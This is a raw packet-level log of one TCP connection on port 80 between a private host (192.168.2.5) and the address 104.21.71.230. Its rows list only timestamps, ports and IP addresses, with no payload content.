Feb 25, 2021 11:05:15.262607098 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.263276100 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.263314962 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.263318062 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.263921022 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.263962984 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.263994932 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.264605045 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.264646053 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.264650106 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.264888048 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.265324116 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.265366077 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.266009092 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.266051054 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.266084909 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.266645908 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.266683102 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.266712904 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.267301083 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.267338991 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.267374039 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.267999887 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.268038988 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.268040895 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.268659115 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.268701077 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.268733978 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.268873930 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.269355059 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.269422054 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.269503117 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.270009995 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.270061016 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.270102978 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.270118952 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.270921946 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.270960093 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.270994902 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.271002054 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.271095037 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.271878004 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.271920919 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.271956921 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.272021055 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.272824049 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.272871017 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.272913933 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.272953987 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.272991896 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.273706913 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.273745060 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.273782015 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.273808002 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.274616957 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.274657965 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.274696112 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.274697065 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.275495052 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.275535107 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.275541067 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.275573969 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.275610924 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.276326895 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.276369095 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.276405096 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.276447058 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.277187109 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.277228117 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.277249098 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.277266026 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.277308941 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.278007030 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.278049946 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.278090000 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.278120995 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.278214931 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.278819084 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.278861046 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.278899908 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.279582977 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.279630899 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.279633999 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.279668093 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.279670954 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.280442953 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.280481100 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.280487061 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.280519009 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.281166077 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.281205893 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.281208992 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.281239986 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.281244040 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.281941891 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.281987906 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.282026052 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.282036066 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.282056093 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.282753944 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.282794952 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.282840014 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.282877922 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.282908916 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.283469915 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.283498049 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.283528090 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.283572912 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.284233093 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.284271002 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.284292936 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.284332991 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.284452915 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.284981966 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.285020113 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.285068989 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.285716057 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.285756111 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.285758018 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.285793066 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.285794020 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.286432028 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.286468983 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.286478996 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.286520958 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.286557913 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.286591053 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.287228107 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.287403107 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.287461042 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.287502050 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.287558079 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.287600994 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.288249016 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.288347960 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.288394928 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.288435936 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.288460016 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.288598061 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.288774014 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.289300919 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.289397001 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.289463043 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.289501905 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.289510965 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.289710999 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.290343046 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.290383101 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.290421963 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.290460110 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.290599108 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.290618896 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.291249990 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.291291952 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.291310072 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.291351080 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.292129040 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.292176962 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.292218924 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.292258024 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.292804956 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.292854071 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.292860985 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.292901039 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.292905092 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.292942047 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.292979002 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.293791056 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.293833017 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.293874025 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.293911934 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.293916941 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.294662952 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.294706106 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.294704914 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.294743061 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.294776917 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.294789076 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.295063019 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.295567036 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.295608997 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.295648098 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.295685053 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.295685053 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.295721054 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.296241999 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.296282053 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.296329021 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.296370983 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.296407938 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.296407938 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.296530008 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.296546936 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.297076941 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.297116995 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.297164917 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.297207117 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.297243118 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.297280073 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.297581911 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.297900915 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.297940969 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.297979116 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.298015118 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.298017025 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.298055887 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.298059940 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.298753023 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.298791885 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.298794985 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.298831940 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.298870087 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.298913956 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.298917055 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.298965931 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.299592018 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.299629927 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.299666882 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.299702883 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.299704075 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.299742937 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.299742937 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.300474882 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.300515890 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.300554991 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.300559044 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.300590992 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.300592899 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.300630093 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.301263094 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.301300049 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.301304102 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.301336050 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.301347017 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.301413059 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.301454067 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.301495075 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.301757097 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.302057028 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.302094936 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.302144051 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.302186012 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.302222967 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.302225113 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.302263975 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.302905083 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.302947044 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.302983046 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.302989960 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.303029060 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.303069115 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.303071022 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.303699017 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.303736925 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.303772926 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.303776979 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.303806067 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.303812027 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.303850889 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.304054022 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.304533005 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.304573059 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.304610014 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.304645061 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.304646969 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.304686069 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.304721117 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.304740906 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.305408001 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.305463076 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.305510044 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.305526972 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.305551052 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.305588961 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.305628061 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.306205034 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.306222916 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.306250095 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.306291103 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.306302071 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.306319952 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.306349039 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.306399107 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.307012081 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.307044983 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.307127953 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.307130098 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.307178974 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.307220936 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.307264090 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.307851076 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.307893991 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.307923079 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.307930946 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.307954073 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.307991982 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.308032990 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.308445930 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.308664083 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.308705091 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.308744907 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.308782101 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.308799982 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.308834076 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.308886051 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.309509993 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.309530020 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.309570074 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.309592009 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.309600115 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.309647083 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.309648037 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.309792995 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.310300112 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.310338974 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.310378075 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.310415983 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.310452938 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.310462952 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.310503960 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.311184883 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.311222076 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.311261892 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.311321020 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.312664986 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.312702894 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.312732935 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.312736988 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.312779903 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.312819004 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.312832117 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.312872887 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.314553022 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.314588070 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.314623117 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.314647913 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.314657927 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.314693928 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.314697027 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.314765930 CET	49731	80	192.168.2.5	104.21.71.230
